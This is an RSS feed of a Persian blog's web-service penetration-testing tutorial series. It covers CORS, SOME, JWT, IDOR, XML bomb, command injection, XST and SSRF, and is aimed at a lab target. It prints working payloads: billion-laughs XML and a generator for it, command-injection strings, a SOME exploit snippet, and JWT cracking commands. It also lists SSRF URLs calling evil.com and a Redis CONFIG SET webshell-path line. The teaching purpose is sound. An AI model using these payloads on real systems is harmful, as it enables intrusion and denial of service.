https://virgool.io/zeroclick/feed آموزش های مرتبط با امنیت اطلاعات فیلم های آموزشی https://www.youtube.com/channel/UCVSnDXD4CbHUKUImibHJPxg سرور دیسکورد پرسش و پاسخ و اطلاع رسانی https://discord.gg/3RMKaPP fa 2026-06-17 05:02:53 https://files.virgool.io/upload/publication/fhyba2cqfn5a/2zg8jm.png https://virgool.io/zeroclick https://virgool.io/zeroclick/%D8%A2%D8%B3%DB%8C%D8%A8-%D9%BE%D8%B0%DB%8C%D8%B1%DB%8C-%D9%87%D8%A7%DB%8C-corssomejwtidor-%D8%AF%D8%B1-%D9%88%D8%A8%D8%B3%D8%B1%D9%88%DB%8C%D8%B3-%D9%87%D8%A7-xwm2fkivu3so در قسمت آخر سری آموزش های تصویری تست نفوذ وبسرویس ها این قسمت با یک سری دیگر از آسیب پذیری های رایج در وبسرویس مثل CORS و SOME و JWT و IDOR آشنا می شویم.آسیب پذیری هایی که این این قسمت می خواهیم درباره آن صحبت کنیم بسیار مرسوم است.برای تست CORS می توانید از روش های زیر هم استفاده نمایید.۱-وبسایت test-cors.org۲-اسکریپت زیر#@merwan curl -I -X OPTIONS \ -H &quotOrigin: ${MY_URL}&quot \ -H 'Access-Control-Request-Method: GET' \ &quot${MY_URL}/SOMETHING&quot 2>&1 | grep -i 'Access-Control-Allow-Origin'۳-اسکنر corsypython3 corsy.py -i /path/urls.txtبرای تست و اکسپلویت SOME ۱-وبسایت someattack۲-کد زیر برای اکسپلویت<button =&quotsome()&quot>Evil Click</button> function some() { open(&quothttp://soap.vul/dvws/vulnerabilities/some/token_generator.php?&mycallback=window.opener.alert(1);<\/script>¶m1=retrievetoken¶m2=dvwsuser¶m3=some&_=1591253461719&quot); setTimeout('location=&quothttp://soap.vul/dvws/vulnerabilities/some/&quot') } استفاده شد.برای تست jwt۱-وبسایت jwt.io۲-ابزار c-jwt-cracker و crackjwt و jwt-cracker برای کرک./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.cAOIAifu3fykvhkHpbuhbvtH807-Z2rI1FS3vX1XMjEیاcrackjwt.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.cAOIAifu3fykvhkHpbuhbvtH807-Z2rI1FS3vX1XMjE dictionary.txtیاjwt-cracker &quoteyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ&quot &quotabcdefghijklmnopqrstuwxyz&quot 6همچنین برای تست idor و access control ها می توانیم ابتدا کلیه پارامتر هارا با Paramspider و یا ابزار های enumeration کلیه پارامتر ها و endpoint ها شناسایی و به ترتیب درجه اهمیت، idor را تست نماییم.python3 paramspider.py --domain soap.vulابزار دیگر برای تست خودکار HUNT است که می توانید با نصب آن در burp از آن استفاده کنید.در این قسمت تا اسلاید ۲۳ پیش رفتیم.اگر مشکلی در دسترسی به فیلم داشتید می توانید از dideo استفاده کنید.پیشاپیش از کم و کاستی ها این آموزش عذرخواهی می کنم.امید است با نظرات شما روز به روز به کیفیت آموزش ها افزوده شود. بی کلیک | Zero Click rezaduty Mon, 08 Jun 2020 10:41:50 +0430 https://virgool.io/zeroclick/%D8%A2%D8%B3%DB%8C%D8%A8-%D9%BE%D8%B0%DB%8C%D8%B1%DB%8C-%D9%87%D8%A7%DB%8C-xml-bombcommand-injection-xst-ssrf-%D8%AF%D8%B1-%D9%88%D8%A8%D8%B3%D8%B1%D9%88%DB%8C%D8%B3-%D9%87%D8%A7-htnh2lninb8c از سری آموزش های تصویری تست نفوذ وبسرویس، این قسمت با یک سری دیگر از آسیب پذیری های رایج در وبسرویس مثل xml bomb و command injection و xst و ssrf آشنا می شویمآسیب پذیری هایی که این این قسمت می خواهیم درباره آن صحبت کنیم بسیار گسترده اند بنابراین بخشی از آموزش را در این جا به صورت متنی قرار می دهم.نمونه payload برای تست xml bomb1) <?xml version=&quot1.0&quot?> <!DOCTYPE results [<!ENTITY long &quotSOME_SUPER_LONG_STRING&quot>]> <results> <result>Now include &long; lots of times to expand the in-memory size of this XML structure</result> <result>&long;&long;&long;&long;&long;&long;&long; &long;&long;&long;&long;&long;&long;&long;&long; &long;&long;&long;&long;&long;&long;&long;&long; &long;&long;&long;&long;&long;&long;&long;&long; Keep it going... &long;&long;&long;&long;&long;&long;&long;...</result> </results> 2) <?xml version=&quot1.0&quot?> <!DOCTYPE results [ <!ENTITY x0 &quotBOOM!&quot> <!ENTITY x1 &quot&x0;&x0;&quot> <!ENTITY x2 &quot&x1;&x1;&quot> <!ENTITY x3 &quot&x2;&x2;&quot> <!-- Add the remaining sequence from x4...x100 (or boom) --> <!ENTITY x99 &quot&x98;&x98;&quot> <!ENTITY boom &quot&x99;&x99;&quot> ]> <results> <result>Explode in 3...2...1...&boom;</result> </results>نمونه کد آسیب پذیر xml bomb:XmlReaderSettings settings = new XmlReaderSettings(); settings.DtdProcessing = DtdProcessing.Parse; settings.ValidationType = ValidationType.None; settings.MaxCharactersFromEntities = 999999999999999; XmlReader reader = XmlReader.Create(new StringReader(xml), settings); while (reader.Read()) { } return string.Empty;برای generate نمودن payload برای آسیب پذیری xml bomb میتوانید از این اسکریپت استفاده کنید.#!/usr/bin/python3 NUM = 55000 def main(): entity = 'A' * NUM refs = '&x;' * NUM templ = '''<?xml version=&quot1.0&quot?> <!DOCTYPE DoS [ <!ENTITY x &quot{entity}&quot> ]> <DoS>{entityReferences}</DoS> '''.format(entity=entity, entityReferences=refs) print(templ) if __name__ == '__main__': main()برای آسیب پذیری command injection میتوانید از payload های زیر استفاده کنید.در لینوکس;id; ;id |id |/usr/bin/id |id|در ویندوز| dir ; dir %26%26 dir %26%26dirادامه payload هابرای تست آسیب پذیری XST می توانید به جای استفاده از اسکریپت که در فیلم گفته شد می توانید از ترمینال این دستور اجرا کنید.curl -X TRACE -H &quotCookie: name=value&quot 127.0.0.1اگر مقدار تنظیم شده برای name در cookie پاسخ درخواست مشاهده شد آسیب پذیری xst وجود دارد.برای تست SSRF و اکسپلویت نمودن آن راه های زیاد و خلاقانه ای وجود دارد.در فیلم توانستیم با SSRF به صورت خیلی ساده port scan انجام بدهیم.یکی دیگه از راه های تست و اکسپلویت استفاده از دیگر پروتکل ها به جای http است.مثال های دیگر عبارتنند از:file://path/to/file sftp://evil.com:11111/ tftp://evil.com:12346/TESTUDPPACKET ldap://localhost:11211/%0astats%0aquit gopher://127.0.0.1:4242/DATA dict://127.0.0.1:6379/CONFIG%20SET%20dir%20/var/www/htmlهمچنین برای تست ssrf می توانید از قابلیت burp collaborator در نرم افزار burp و همچنین ssrfmap استفاده کنیددر این قسمت تا اسلاید ۱۷ پیش رفتیم.اگر مشکلی در دسترسی به فیلم داشتید می توانید از dideo استفاده کنید.پیشاپیش از کم و کاستی ها این آموزش عذرخواهی می کنم.امید است با نظرات شما روز به روز به کیفیت آموزش ها افزوده شود. بی کلیک | Zero Click rezaduty Sun, 07 Jun 2020 12:22:21 +0430 https://virgool.io/zeroclick/%D8%A2%D8%B3%DB%8C%D8%A8-%D9%BE%D8%B0%DB%8C%D8%B1%DB%8C-%D9%87%D8%A7%DB%8C-xxexpath-injectionapi-sql-injection-nfudsdnvjlv4 از سری آموزش های تصویری تست نفوذ وبسرویس، این قسمت با یک سری از آسیب پذیری های رایج در وبسرویس مثل xxe و xpath injection و api sql injection آشنا می شویمهمچنین با ابزار های جمع آوری اطلاعات که در قسمت پیش با آن ها آشنا شده بودیم سعی می کنیم فایل wsdl پیدا کنیم.لیست ابزار هایی که این قسمت با آن به صورت مختصر کار می کنیم عبارتنند از:burpwfuzzwizdlerدر این قسمت تا اسلاید ۱۳ پیش رفتیم.اگر مشکلی در دسترسی به فیلم داشتید می توانید از dideo استفاده کنید.پیشاپیش از کم و کاستی ها این آموزش عذرخواهی می کنم.امید است با نظرات شما روز به روز به کیفیت آموزش ها افزوده شود. بی کلیک | Zero Click rezaduty Sun, 22 Mar 2020 12:57:01 +0430 https://virgool.io/zeroclick/%D9%85%D9%82%D8%AF%D9%85%D9%87-%D8%A7%DB%8C-%D8%A8%D8%B1-%D8%AA%D8%B3%D8%AA-%D9%86%D9%81%D9%88%D8%B0-%D9%88%D8%A8%D8%B3%D8%B1%D9%88%DB%8C%D8%B3-os12uh6bbyy4 از سری آموزش های تصویری تست نفوذ وبسرویس، این قسمت با مفهوم وبسرویس و api و انواع وبسرویس آشنا می شویم.همچنین با یک سری از ابزار های جمع آوری اطلاعات و ابزار های کار تست انواع وبسرویس آشنا می شویم.لیست ابزار هایی که این قسمت با آن به صورت مختصر کار می کنیم عبارتنند از:opendoorwfuzzpostmansoapuiwizdlerburpدر این قسمت تا اسلاید 10 پیش رفتیماگر مشکلی در دسترسی به فیلم داشتید می توانید از dideo استفاده کنید.پی نوشتقسمت ۲ - آسیب پذیری های xxe,xpath injection,api sql injection در وبسرویس هاقسمت ۳ - آسیب پذیری های xml bomb,command injection, xst, ssrf در وبسرویس هاقسمت ۴ - آسیب پذیری های CORS,SOME,JWT,IDOR در وبسرویس هاپیشاپیش از کم و کاستی ها این آموزش عذرخواهی می کنم.امید است با نظرات شما روز به روز به کیفیت آموزش ها افزوده شود. بی کلیک | Zero Click rezaduty Wed, 04 Mar 2020 12:10:22 +0330